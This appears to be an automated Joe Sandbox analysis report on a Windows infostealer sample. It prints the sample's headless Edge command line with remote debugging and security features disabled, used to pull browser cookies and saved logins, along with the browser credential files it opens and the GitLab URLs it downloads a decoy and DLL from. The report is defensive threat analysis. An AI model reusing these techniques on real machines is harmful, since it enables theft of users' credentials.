      Source: hJ1bl8p7dJ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: hJ1bl8p7dJ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: hJ1bl8p7dJ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: hJ1bl8p7dJ.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256r source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression\Release\net8.0-windows\System.IO.Compression.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdbSHA256kX source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdbSHA256 source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.bundle_green\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdbSHA256@ source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: System.Diagnostics.Process.ni.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.bundle_green\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdbSHA256(s source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.provider.e_sqlite3\obj\Release\net6.0\SQLitePCLRaw.provider.e_sqlite3.pdbSHA256 source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.provider.e_sqlite3\obj\Release\net6.0\SQLitePCLRaw.provider.e_sqlite3.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D37CB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\Projects\HK_NAVITE_DLL_v3_OKE\HK\bin\Release\net8.0\win-x64\native\oke.pdb source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: hJ1bl8p7dJ.exe
      Source: Binary string: D:\a\cb\cb\cb\bld\bin\e_sqlite3\win\v142\plain\x64\e_sqlite3.pdb source: hJ1bl8p7dJ.exe, 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1901160535.000002107E400000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.dr
      Source: Binary string: System.IO.Compression.ni.pdb source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdbSHA256 source: hJ1bl8p7dJ.exe, 00000000.00000000.1327821687.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D2DCB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: hJ1bl8p7dJ.exe
      Source: hJ1bl8p7dJ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: hJ1bl8p7dJ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: hJ1bl8p7dJ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: hJ1bl8p7dJ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: hJ1bl8p7dJ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: hJ1bl8p7dJ.exe Static PE information: section name: .managed
      Source: hJ1bl8p7dJ.exe Static PE information: section name: hydrated
      Source: e_sqlite3.dll.0.dr Static PE information: section name: _RDATA
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Code function: 0_2_00007FFEEE1ACC82 push rbx; retn 000Ah 0_2_00007FFEEE1ACC89
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe File created: C:\Users\user\Desktop\e_sqlite3.dll
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Memory allocated: 21079D50000 memory reserve | memory write watch
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Code function: 0_2_00007FFEEE22BE70 GetSystemInfo, 0_2_00007FFEEE22BE70
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E11D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: KD:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.man
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E11D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: RD:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.man
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E11D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 2microsoft-hyper-v-client-migration-replacement.man
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E11D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SD:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1902820558.00007FF7D39EF000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E11D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 3microsoft-hyper-v-drivers-migration-replacement.man
      Source: hJ1bl8p7dJ.exe, 00000000.00000003.1899545762.0000021079E78000.00000004.00000020.00020000.00000000.sdmp, hJ1bl8p7dJ.exe, 00000000.00000002.1900144618.0000021079E78000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1900502180.000002107E11D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: +microsoft-hyper-v-migration-replacement.man
      Source: hJ1bl8p7dJ.exe, 00000000.00000002.1901449352.0000025112101000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SA0#P
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Process information queried: ProcessInformation
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Code function: 0_2_00007FFEEE259AC0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FFEEE259AC0
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Process token adjusted: Debug
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Code function: 0_2_00007FFEEE24B728 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FFEEE24B728
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Documents\Your_Benefits_and_Role.docx" /o ""
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9230 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless

      Language, Device and Operating System Detection

      Source: Yara match File source: hJ1bl8p7dJ.exe, type: SAMPLE
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Code function: 0_2_00007FFEEE24BFF0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00007FFEEE24BFF0

      Stealing of Sensitive Information

      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite-shm
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite-wal
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Directory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Directory queried: C:\Users\user\Documents\FACWLRWHGG
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Directory queried: C:\Users\user\Documents\MNULNCRIYC
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Directory queried: C:\Users\user\Documents\NHPKIZUUSG
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Directory queried: C:\Users\user\Documents\PSAMNLJHZW
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Directory queried: C:\Users\user\Documents\YPSIACHYXW
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Directory queried: C:\Users\Public\Documents\638724355399194976\Files
      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Directory queried: C:\Users\Public\Documents\638724355399194976\Files\D
      Source: Yara match File source: Process Memory Space: hJ1bl8p7dJ.exe PID: 7760, type: MEMORYSTR

      Remote Access Functionality

      Source: C:\Users\user\Desktop\hJ1bl8p7dJ.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless

      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
      Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Query Registry | Remote Desktop Protocol | 11 Data from Local System | 1 Remote Access Software | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 11 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 11 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 4 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph (ID: 1590664, Sample: hJ1bl8p7dJ.exe, Startdate: 14/01/2025, Architecture: WINDOWS, Score: 72)
  Signatures: Yara detected Telegram Recon; Drops password protected ZIP file; AI detected suspicious sample; Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
  DNS/IP: ip-api.com; gitlab.com; 2 other IPs or domains
  hJ1bl8p7dJ.exe (started)
    Signatures: Attempt to bypass Chrome Application-Bound Encryption; Tries to harvest and steal browser information (history, passwords, etc)
    DNS/IP: ip-api.com 208.95.112.1, 50007, 50010, 80 TUT-ASUS United States; api.ipify.org 104.26.12.205, 443, 50005, 50006 CLOUDFLARENETUS United States; 2 other IPs or domains
    Dropped: C:\Users\user\Desktop\e_sqlite3.dll, PE32+
    Started: msedge.exe (which started msedge.exe); msedge.exe (which started msedge.exe); WINWORD.EXE; conhost.exe

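| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| hJ1bl8p7dJ.exe | 3% | ReversingLabs | | |
| hJ1bl8p7dJ.exe | 1% | Virustotal | | Browse |

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| C:\Users\user\Desktop\e_sqlite3.dll | 0% | ReversingLabs | | |

No Antivirus matches

No Antivirus matches

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| http://schemas.openxmlformats.o | 0% | Avira URL Cloud | safe | |
| https://api.ipify.orgY | 0% | Avira URL Cloud | safe | |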

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- | --- |
| bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high |
| gitlab.com | 172.65.251.78 | true | false | | high |
| s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high |
| api.ipify.org | 104.26.12.205 | true | false | | high |
| ip-api.com | 208.95.112.1 | true | false | | high |

| Name | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- |
| https://gitlab.com/app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=false | false | | high |
| https://api.ipify.org/ | false | | high |
| https://gitlab.com/hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inline=false | false | | high |
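
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- | --- | --- |
| 208.95.112.1 | ip-api.com | United States | | 53334 | TUT-ASUS | false |
| 172.65.251.78 | gitlab.com | United States | | 13335 | CLOUDFLARENETUS | false |
| 104.26.12.205 | api.ipify.org | United States | | 13335 | CLOUDFLARENETUS | false |

| IP |
| --- |
| 127.0.0.1 |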
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1590664
Start date and time: 2025-01-14 13:11:20 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 18s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: hJ1bl8p7dJ.exe
renamed because original name is a hash value
Original Sample Name: ddefa728f5ff2f70fd097609edc4e918afd5fa212115ba2b06f818c1263df23f.exe
Detection: MAL
Classification: mal72.troj.spyw.winEXE@17/12@3/4
                                                                                                                                                                      EGA Information:
                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                      HCA Information:
                                                                                                                                                                      • Successful, ratio: 88%
                                                                                                                                                                      • Number of executed functions: 12
                                                                                                                                                                      • Number of non-executed functions: 93
                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 52.109.32.97, 2.23.242.162, 52.109.89.19, 52.113.194.132, 199.232.214.172, 52.111.236.35, 52.111.236.33, 52.111.236.34, 52.111.236.32, 20.44.10.122, 2.21.65.149, 2.21.65.130, 13.107.246.45, 20.190.159.75, 172.202.163.200
                                                                                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, templatesmetadata.office.net.edgekey.net, weu-azsc-000.roaming.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, templatesmetadata.office.net, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.n
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                      No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | DYv2ldz5xT.exe | malicious | Unknown | ip-api.com/json/8.46.123.189
208.95.112.1 | rBFTGm5ioO.exe | malicious | Unknown | ip-api.com/json/8.46.123.189
208.95.112.1 | DYv2ldz5xT.exe | malicious | Unknown | ip-api.com/json/8.46.123.189
208.95.112.1 | rBFTGm5ioO.exe | malicious | Unknown | ip-api.com/json/8.46.123.189
208.95.112.1 | nNnzvybxiy.exe | malicious | Unknown | ip-api.com/json/8.46.123.189
208.95.112.1 | StL9joVVcT.exe | malicious | Unknown | ip-api.com/json/8.46.123.189
208.95.112.1 | zbROZPjAQ7.exe | malicious | Unknown | ip-api.com/json/8.46.123.189
208.95.112.1 | 6kK89mR2aq.exe | malicious | Unknown | ip-api.com/json/8.46.123.189
208.95.112.1 | #U2800.exe | malicious | Unknown | ip-api.com/json/8.46.123.189
208.95.112.1 | rordendecompra_.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
Match | Associated Sample Name / URL | Detection | Threat Name | Context
gitlab.com | DYv2ldz5xT.exe | malicious | Unknown | 172.65.251.78
gitlab.com | rBFTGm5ioO.exe | malicious | Unknown | 172.65.251.78
gitlab.com | DYv2ldz5xT.exe | malicious | Unknown | 172.65.251.78
gitlab.com | rBFTGm5ioO.exe | malicious | Unknown | 172.65.251.78
gitlab.com | nNnzvybxiy.exe | malicious | Unknown | 172.65.251.78
gitlab.com | StL9joVVcT.exe | malicious | Unknown | 172.65.251.78
gitlab.com | #U2800.exe | malicious | Unknown | 172.65.251.78
gitlab.com | hnskdfgjgar22.bat | malicious | Abobus Obfuscator, Braodo | 172.65.251.78
gitlab.com | hnsadjhfg18De.bat | malicious | Abobus Obfuscator, Braodo | 172.65.251.78
gitlab.com | slifdgjsidfg19.bat | malicious | Abobus Obfuscator, Braodo | 172.65.251.78
bg.microsoft.map.fastly.net | nNnzvybxiy.exe | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | pdf_2025 QUOTATION - #202401146778.pdf (83kb).com.exe | malicious | PureLog Stealer, Quasar | 199.232.214.172
bg.microsoft.map.fastly.net | PO 2025918 pdf.exe | malicious | FormBook, PureLog Stealer | 199.232.210.172
bg.microsoft.map.fastly.net | 1579614525244583223.js | malicious | Strela Downloader | 199.232.210.172
bg.microsoft.map.fastly.net | New purchase order.exe | malicious | FormBook, PureLog Stealer | 199.232.210.172
bg.microsoft.map.fastly.net | 35491083472324549.js | malicious | Strela Downloader | 199.232.214.172
bg.microsoft.map.fastly.net | 28236151432955330765.js | malicious | Strela Downloader | 199.232.210.172
bg.microsoft.map.fastly.net | ProductBOMpq_v4.xlsm | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | 17201670993971103.js | malicious | Strela Downloader | 199.232.214.172
bg.microsoft.map.fastly.net | Scanned-IMGS_from NomanGroup IDT.scr.exe | malicious | FormBook | 199.232.210.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context
